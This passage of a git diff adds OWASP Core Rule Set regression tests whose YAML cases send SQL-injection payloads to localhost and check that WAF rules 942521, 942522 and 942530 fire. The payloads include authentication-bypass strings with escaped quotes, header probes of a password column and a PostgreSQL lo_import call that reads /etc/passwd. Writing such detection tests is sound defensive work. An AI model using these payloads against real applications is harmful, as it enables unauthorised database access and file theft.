22.....%60%60.%22%40%40%22.%27%21%21%21%21%21%27%21%21%27%40%40%40%22%60.....%60%40%40%27%22%40%40%40%40%60%27%22%40%40%40%40%60%21%21%21%21%27%22%21%21%21%21%60%21%60%40%40%40%40%22%40%40%40%40%22%21%21%22%21%21%21%21%21%27%40%40%22...%60%22%27.%60%22%40%22%40%40%40%40%40%22%21%21%22%21%21%21%21%22%40%40%40%60%40%40%27%21%21%22.....%60%21%21%21%60%40%40%22%40%60%40%40%40%60%27....%27%40%40%40%22%60%40%40%40%40%40%60%60%21%21%22%40%22..%27%21%21%21%21%21%60%40%40%40%40%27....%22.....%27%60%21%21%21%27%21%22%40%60%60%27%60%27%40%27%40%40%40%40%27%21%21%27%40%40%60%21%22%60%21%21%21%27..%22%27%40%40%40%60%60.....%27.....%27%40%40%22%22%27.....%22.%60%21%60%40%40%60%21%60%40%40%40%40%27%40%40%40%27%22..%60%21%60%40%40%40%60%60%40%40%40%40%22%21%21%21%21%21%22.%60%21%21%27%60%40%40%40%40%60%40%40%40%40%40%27%22.%22...%27...%27.....%27%40%40%40%40%40%60.%27%40%40%40%27%21%21%21%21%21%22%40%22%40%60%27%21%21%21%27%40%27%40%40%40%40%60%40%40%40%40%60%27%40%40%40%40%40%60%21%21%21%60%40%40%22...%60..%27.....%27.%27%27%21%60.%22%22%21%21%21%27.....%22%40%40%40%22%40%40%40%40%40%60...%27.%60%22..%27%21%60%21%21%21%21%60..%60....%22%27%40%40%40%40%22..%27.%27....%27%40%40%60...%22%21%22%22%21%60%21%21%21%21%21%27%21%21%27%22%27....%27%22%21%21%21%27%40%40%40%27.....%22...%60..%60%40%40%40%40%40%60%22%40%40%60.%27%21%27%21%21%21%21%21%27....%60%21%21%21%27%21%27%40%60%60...%22%21%21%21%21%60%27%40%22%22%40%22...%60%40%40%27..%22%21%21%21%21%60..%27%40%40%27%40%40%27..%22%40%40%40%40%60....%60%40%40%40%60%40%40%40%40%60%22%21%21%21%60%21%60%40%40%40%22..%27%40%40%40%60%40%40%60%60%22%40%40%40%40%22%21%21%60%40%40%22%40%60%21%21%60%27.....%27%40%40%40%40%40%22.%60%21%21%21%21%60%21%21%60.....%22%21%21%27%27%21%22%40%40%40%27%27%22%40%40%40%40%60....%60%22.%27%21%21%21%27%40%40%40%40%60...%27..%60%21%21%60...%60%21%60%40%40%27.....%27%40%40%27%27%40%40%27..%27.%27%40%22%27%21%22%40%40%22%21%21%21%27%60.....%60.....%22.%60%40%60%40%40%40%60..%22.....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%40%40%22%40%40%40%40%40%27....%60.%27....%27%21%21%21%60%21%21%21%21%21%60..%27.%27%40%40%22%60%40%40%40%60.....%27...%27%21%21%21%21%60..%60....%60%40%40%40%27%21%21%21%27%60%21%21%21%21%27...%60%40%40%40%60....%60%27%40%40%40%40%27%40%40%60..%27%40%40%27..%27%22%21%22%40%40%40%27...%22%21%21%21%21%21%60%40%40%40%40%40%22%40%40%40%40%22%60%21%27..%60%21%21%21%27%40%40%40%22%21%21%21%21%27%40%40%40%40%22%40%60%22.....%22.....%27%40%40%40%40%40%27%21%21%21%21%27%40%27%40%40%40%40%40%27%60%27%22%21%22%21%21%21%21%60%40%40%40%40%40%27..%22.%60%40%40%40%40%40%22.%60%60%21%21%21%21%21%60%21%21%21%22...%60%40%22%21%21%21%21%22%21%21%60%40%40%40%40%60%21%21%21%21%22%40%27%21%21%21%60%27%40%40%40%40%22.....%60....%22...%60%21%21%21%21%60%21%21%21%21%21%27%40%40%60%40%40%40%40%27%40%60%21%22.....%22%21%21%21%27%40%40%40%40%27....%22%40%40%40%40%40%60%40%27.....%22%21%21%21%60%40%40%60%21%21%21%21%21%22%60%40%40%40%40%27%21%21%21%22...%60%40%60...%27...%60%21%21%21%22%21%21%21%21%27%21%27%21%21%60.%60%21%21%60..%22..%60.....%22..%22....%27%21%21%21%21%27%60%40%40%40%40%40%22%21%21%21%21%22%40%40%40%40%40%27%40%40%40%40%40%60.%60....%60%60%40%40%40%40%22%27%40%27%40%60%21%21%21%21%21%27...%27%40%40%40%40%40%27.%27.....%60%21%21%60%21%21%21%21%21%22%22%40%40%40%27%40%60%21%21%21%22%21%21%21%21%21%27..%22....%27%21%21%21%21%21%27...%60.....%60%40%22%21%21%21%21%27%27%21%21%21%21%21%22%60%27%21%21%21%27..%60%40%60%21%21%21%21%21%27%60%27%21%21%27%21%21%21%60%21%21%21%21%27%40%60%22%21%60.....%27%40%40%40%40%40%27.....%60%21%21%60%40%40%40%27...%60%21%21%21%60%40%40%40%22%22%21%21%21%21%21%22%40%40%40%40%27%40%22.%22.%22%40%40%40%40%40%22%40%60....%60....%27%21%21%21%21%21%22%21%21%21%21%60%21%21%21%21%21%27....%27%21%21%21%21%60%22%60%40%40%40%40%40%60...%22%40%60%40%40%22%40%40%40%40%40%27%21%21%27%22%40%40%60%27%22%40%40%40%22%21%60%27%21%21%21%21%21%60...%27%40%40%22%21%21%21%27%21%27%21%21%21%60%21%21%21%21%21%60%22.....%22%21%21%21%21%27%40%40%40%40%60%21%21%27.....%22%21%21%21%22%21%21%22%21%21%22%40%40%27%21%21%21%21%22%40%40%40%40%27%40%40%40%40%27....%60%40%40%40%60%40%22...%27.....%27%40%40%22%40%40%40%22%21%21%21%21%21%22...%27..%22%21%22%40%40%40%40%40%27....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%22%27%40%40%40%40%40%60%21%21%21%27%40%40%40%27%60.%27%21%21%21%22....%60%40%27.....%22%40%40%40%40%40%27%40%60%40%40%40%40%60%40%40%40%60%21%21%21%21%21%60%27%21%21%21%27....%22%22%21%21%27...%27%21%21%21%27...%27%40%22....%22%40%40%27%21%21%21%21%27.....%22%40%40%40%40%27%22....%22...%27%21%21%21%60....%22%40%40%40%22...%27%40%27..%60%21%21%27%40%40%40%40%40%60%40%60%21%21%21%21%21%27.....%60%27%22%22%27%27.%22%60%21%21%22%40%40%60%21%22%60%21%21%27..%60%21%21%21%21%60%21%21%21%21%21%60%40%40%22%21%21%21%21%21%60%40%40%60....%60%40%40%40%40%40%22%40%40%40%40%60.....%60%27%27...%27%22%22%40%40%60.....%22%22%27%40%60%27%27.....%22%40%27%60.....%60%40%22%40%40%40%40%27%21%21%21%21%60%40%40%40%27%40%40%40%40%40%22%21%21%21%21%60.%22%21%21%27%40%27%22%21%21%21%21%60%40%40%27%40%40%40%40%27%21%21%27%27..%27%27%21%21%21%21%21%27%40%27.%60%21%21%21%21%21%27%40%40%40%40%27%21%21%27%40%40%40%40%22...%22%60%27%40%40%40%22%40%40%40%22%22%21%21%21%22%21%21%60...%27.....%60%40%40%40%60%21%21%21%60%40%40%40%40%40%22%22%21%21%21%60%21%21%21%21%21%27%27%21%21%21%21%22....%27%21%21%21%21%21%27%21%21%21%22%21%21%21%21%21%27%22....%60%27%40%40%27%21%27.....%22%21%22%21%21%21%21%21%22%21%21%21%21%22...%27%22%40%40%40%60%40%40%40%40%40%27%27%21%21%27....%22.....%22%21%21%21%22%40%40%40%40%40%27%21%21%21%21%60%22.....%60..%60%22%21%21%21%22%22%27...%27%40%40%40%40%27.....%27%21%21%21%60...%27.%22%21%21%21%21%21%27%21%27%21%21%21%22%40%27.....%27%21%21%21%21%22%40%27...%27%21%21%27%40%40%22%40%40%40%40%40%60..%27%21%27.....%22%22%21%21%21%21%21%27%40%40%40%40%22%40%40%40%60.....%60%21%21%21%21%21%27....%27%27%40%40%40%40%27.....%27%21%60....%22...%22%21%21%21%21%27%21%21%22%40%27%40%40%40%40%40%27%21%21%21%22%21%21%21%21%27%21%21%21%21%60%27%27..%22%22%21%21%21%27%22%21%60..%22%27%27%60..%22%21%22%21%21%21%21%21%27..%27..%27.%27%27%21%21%21%21%60%27%21%21%21%21%60..%27%21%21%22.....%22%21%21%21%21%27%21%21%21%27....%60.....%22...%22%22%22.%22%27.%60%21%21%21%21%22%60%40%22.....%27%21%21%21%21%22%40%60...%22.%22.....%27%27..%22%27%21%21%21%21%21%60....%22%21%21%21%22..%60%21%21%21%21%60%21%21%21%21%27....%60%27%40%40%40%22%27.%27....%22%40%40%40%60%21%21%21%21%22%40%40%40%40%40%27%21%21%21%60%40%40%40%40%60.%22..%22%40%40%22%21%60%22%21%21%21%21%27%27%27.%27%22%40%40%40%22%40%40%40%27....%22%21%21%21%21%21%22%21%21%21%21%22%21%27%60%27%21%21%21%60%21%27...%60%21%21%21%21%27...%27%40%40%40%40%40%60%21%21%60%21%21%21%22%40%60%40%40%40%40%40%60%27%60..%22%22%21%21%27%22%40%40%27...%22..%22....%22%27%60%40%40%27....%27%40%40%40%40%22%60%21%21%60.%60%40%27%21%60%21%22...%27...%27.....%27%21%21%22..%22%22%40%27%21%21%21%27%40%40%22.%27%21%21%21%60%40%60%60%21%21%21%60%21%21%22...%27.%22%21%21%21%27...%22%21%21%21%21%60%40%40%40%40%60%22.%27%21%21%60.....%60%21%21%60%21%21%21%21%21%27.%27%40%40%40%40%40%22%21%21%21%60..%27%21%21%21%21%21%27%21%21%60%40%40%27%21%21%21%27.%22%21%21%21%21%22.%22%40%40%40%40%40%22%21%21%21%22%21%21%22%22%21%21%21%60%27%21%21%60%40%40%40%40%40%27..%27%40%60.....%22%21%21%21%27.%27%21%21%21%21%27%27....%22%40%40%27%40%40%40%40%40%60%60or" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-18 + desc: "Performance test" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-19 + desc: "Negative test: performance test" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-20 + desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-21 + desc: "Detects odd number of quotes in request headers" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and starts_with(password) and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-22 + desc: "Detects odd number of quotes in request headers" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and lo_import('/etc' || '/pass' || 'wd')::int::bool and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-23 + desc: "Detects odd number of quotes in request headers" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and lo_get(16400)::text::bool and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-24 + desc: "Detects odd number of quotes in request headers" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1'and json_search (json_array(password),0b11000010110110001101100,'t_______________')#" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + version: HTTP/1.0 + output: + log_contains: id "942521" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml new file mode 100644 index 00000000..92b56991 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml @@ -0,0 +1,154 @@ +--- +meta: + author: "terjanq, Franziska Bühler" + description: "Detects basic SQL authentication bypass attempts 4.1/4" + enabled: true + name: 942522.yaml +tests: + - test_title: 942522-1 + desc: "Blocks bypass with escaped quotes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # \'or'1 + data: "var=%5C'or'1" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_title: 942522-2 + desc: "Blocks bypass with escaped quotes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # \"or"1 + data: "var=%5C%22or%221" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_title: 942522-3 + desc: "Blocks bypass with escaped quotes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # \`or`1 + data: "var=%5C%60or%601" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_title: 942522-4 + desc: "Blocks bypass with: \\'and" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=%5C'and" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_title: 942522-5 + desc: "Negative test: doesn't block normal SQLi" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='or'1" + version: HTTP/1.0 + output: + no_log_contains: id "942522" + - test_title: 942522-6 + desc: "Negative test: doesn't block escaped quotes without following (and|or)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=%5C' foo or" + version: HTTP/1.0 + output: + no_log_contains: id "942522" + - test_title: 942522-7 + desc: "New line bypass" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=newline%0A%5C' and 1" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_title: 942522-8 + desc: "Negative test: Wikipedia article about SQLi" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" + version: HTTP/1.0 + output: + no_log_contains: id "942522" + - test_title: 942522-9 + desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" + version: HTTP/1.0 + output: + log_contains: id "942522" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml new file mode 100644 index 00000000..63a3993c --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml @@ -0,0 +1,23 @@ +--- +meta: + author: "Franziska Bühler" + description: "Detects SQL query termination" + enabled: true + name: 942530.yaml +tests: + - test_title: 942530-1 + desc: "Detects SQL query termination with ';" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "email=admin@juice-sh.op';&password=foo" + version: HTTP/1.0 + output: + log_contains: id "942530" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml new file mode 100644 index 00000000..f4b72dab --- /dev/null +++ 